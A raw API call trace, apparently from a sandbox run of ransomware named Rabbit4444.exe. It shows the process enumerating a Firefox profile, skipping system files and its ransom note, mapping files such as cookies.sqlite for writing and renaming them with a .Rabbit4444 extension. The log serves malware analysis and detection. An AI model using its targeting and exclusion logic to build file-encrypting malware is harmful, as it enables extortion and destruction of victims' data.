FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff9a54e3, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xff9a54e3, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xff9a54e3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x329, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="containers.json", cAlternateFileName="CONTAI~1.JSO")) returned 1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2="Rabbit4444.exe") returned -1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2=".") returned 1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2="..") returned 1 [0050.731] lstrcmpiW (lpString1="containers.json", lpString2="windows") returned -1 [0050.732] lstrcmpiW (lpString1="containers.json", lpString2="bootmgr") returned 1 [0050.732] lstrcmpiW (lpString1="containers.json", lpString2="pagefile.sys") returned -1 [0050.732] lstrcmpiW (lpString1="containers.json", lpString2="boot") returned 1 [0050.732] lstrcmpiW (lpString1="containers.json", lpString2="ids.txt") returned -1 [0050.732] lstrcmpiW (lpString1="containers.json", lpString2="NTUSER.DAT") returned -1 [0050.732] lstrcpyW (in: lpString1=0x130ebcc, lpString2="containers.json" | out: lpString1="containers.json") returned="containers.json" [0050.732] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json", dwFileAttributes=0x0) returned 1 [0050.732] lstrlenW (lpString="containers.json") returned 15 [0050.732] lstrlenW (lpString="Rabbit4444") returned 10 [0050.732] lstrcmpiW (lpString1="iners.json", lpString2="Rabbit4444") returned -1 [0050.732] lstrlenW (lpString=".dll") returned 4 [0050.732] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.732] lstrlenW (lpString=".lnk") returned 4 [0050.732] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.732] lstrlenW (lpString=".ini") returned 4 [0050.732] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.732] lstrlenW (lpString=".sys") returned 4 [0050.732] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.732] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.732] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14204314484) returned 1 [0050.732] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=809) returned 1 [0050.732] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0050.733] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0050.733] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x298 [0050.734] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0x70000 [0050.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.735] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.735] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14204612200) returned 1 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0050.735] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0050.735] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.736] CloseHandle (hObject=0x298) returned 1 [0050.736] CloseHandle (hObject=0x278) returned 1 [0050.736] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json.Rabbit4444") returned 100 [0050.736] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\containers.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\containers.json.rabbit4444"), dwFlags=0x1) returned 1 [0050.736] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff97f27a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xff97f27a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x439749, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="Rabbit4444.exe") returned -1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2=".") returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="..") returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="windows") returned -1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="bootmgr") returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="pagefile.sys") returned -1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="boot") returned 1 [0050.736] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="ids.txt") returned -1 [0050.737] lstrcmpiW (lpString1="content-prefs.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.737] lstrcpyW (in: lpString1=0x130ebcc, lpString2="content-prefs.sqlite" | out: lpString1="content-prefs.sqlite") returned="content-prefs.sqlite" [0050.737] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite", dwFileAttributes=0x0) returned 1 [0050.737] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0050.737] lstrlenW (lpString="Rabbit4444") returned 10 [0050.737] lstrcmpiW (lpString1="efs.sqlite", lpString2="Rabbit4444") returned -1 [0050.737] lstrlenW (lpString=".dll") returned 4 [0050.737] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.737] lstrlenW (lpString=".lnk") returned 4 [0050.737] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.738] lstrlenW (lpString=".ini") returned 4 [0050.738] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.738] lstrlenW (lpString=".sys") returned 4 [0050.738] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.738] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.738] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.738] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14204856691) returned 1 [0050.738] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=229376) returned 1 [0050.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0050.738] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x38300, lpName=0x0) returned 0x298 [0050.739] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x38300) returned 0x70000 [0050.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.746] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.746] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.747] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14205729545) returned 1 [0050.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.747] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0050.747] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.749] CloseHandle (hObject=0x298) returned 1 [0050.749] CloseHandle (hObject=0x278) returned 1 [0050.749] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite.Rabbit4444") returned 105 [0050.749] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\content-prefs.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\content-prefs.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0050.750] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ef1bce, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x1ef1bce, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="Rabbit4444.exe") returned -1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2=".") returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="..") returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="windows") returned -1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="bootmgr") returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="pagefile.sys") returned -1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="boot") returned 1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="ids.txt") returned -1 [0050.750] lstrcmpiW (lpString1="cookies.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.750] lstrcpyW (in: lpString1=0x130ebcc, lpString2="cookies.sqlite" | out: lpString1="cookies.sqlite") returned="cookies.sqlite" [0050.750] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite", dwFileAttributes=0x0) returned 1 [0050.751] lstrlenW (lpString="cookies.sqlite") returned 14 [0050.751] lstrlenW (lpString="Rabbit4444") returned 10 [0050.751] lstrcmpiW (lpString1="ies.sqlite", lpString2="Rabbit4444") returned -1 [0050.751] lstrlenW (lpString=".dll") returned 4 [0050.751] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.751] lstrlenW (lpString=".lnk") returned 4 [0050.751] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.751] lstrlenW (lpString=".ini") returned 4 [0050.751] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.751] lstrlenW (lpString=".sys") returned 4 [0050.751] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.751] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.752] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.752] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14206230927) returned 1 [0050.752] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=524288) returned 1 [0050.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0050.752] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0050.752] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x298 [0050.753] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0050.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.768] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.768] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.768] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.768] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.768] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14207923169) returned 1 [0050.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0050.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0050.769] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0050.773] CloseHandle (hObject=0x298) returned 1 [0050.773] CloseHandle (hObject=0x278) returned 1 [0050.773] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite.Rabbit4444") returned 99 [0050.774] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\cookies.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\cookies.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0050.774] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashes", cAlternateFileName="")) returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="Rabbit4444.exe") returned -1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2=".") returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="..") returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="windows") returned -1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="bootmgr") returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="pagefile.sys") returned -1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="boot") returned 1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="ids.txt") returned -1 [0050.774] lstrcmpiW (lpString1="crashes", lpString2="NTUSER.DAT") returned -1 [0050.774] lstrcpyW (in: lpString1=0x130ebcc, lpString2="crashes" | out: lpString1="crashes") returned="crashes" [0050.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0050.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118f48 [0050.774] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf63f0 [0050.774] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2d6a08c7, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb844f993, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="datareporting", cAlternateFileName="DATARE~1")) returned 1 [0050.774] lstrcmpiW (lpString1="datareporting", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.774] lstrcmpiW (lpString1="datareporting", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="Rabbit4444.exe") returned -1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2=".") returned 1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="..") returned 1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="windows") returned -1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="bootmgr") returned 1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="pagefile.sys") returned -1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="boot") returned 1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="ids.txt") returned -1 [0050.775] lstrcmpiW (lpString1="datareporting", lpString2="NTUSER.DAT") returned -1 [0050.775] lstrcpyW (in: lpString1=0x130ebcc, lpString2="datareporting" | out: lpString1="datareporting") returned="datareporting" [0050.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0050.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x103f58 [0050.775] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6550 [0050.775] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe967070, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe967070, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe967070, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x292e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="extensions.json", cAlternateFileName="EXTENS~1.JSO")) returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="Rabbit4444.exe") returned -1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2=".") returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="..") returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="windows") returned -1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="bootmgr") returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="pagefile.sys") returned -1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="boot") returned 1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="ids.txt") returned -1 [0050.775] lstrcmpiW (lpString1="extensions.json", lpString2="NTUSER.DAT") returned -1 [0050.775] lstrcpyW (in: lpString1=0x130ebcc, lpString2="extensions.json" | out: lpString1="extensions.json") returned="extensions.json" [0050.775] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json", dwFileAttributes=0x0) returned 1 [0050.776] lstrlenW (lpString="extensions.json") returned 15 [0050.776] lstrlenW (lpString="Rabbit4444") returned 10 [0050.776] lstrcmpiW (lpString1="sions.json", lpString2="Rabbit4444") returned 1 [0050.776] lstrlenW (lpString=".dll") returned 4 [0050.776] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.776] lstrlenW (lpString=".lnk") returned 4 [0050.776] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.776] lstrlenW (lpString=".ini") returned 4 [0050.776] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.776] lstrlenW (lpString=".sys") returned 4 [0050.776] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.776] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.776] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14208677239) returned 1 [0050.776] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=10542) returned 1 [0050.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0050.776] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0050.776] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c30, lpName=0x0) returned 0x298 [0050.778] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c30) returned 0x70000 [0050.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.780] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14209123129) returned 1 [0050.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0050.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0050.781] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.781] CloseHandle (hObject=0x298) returned 1 [0050.781] CloseHandle (hObject=0x278) returned 1 [0050.781] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 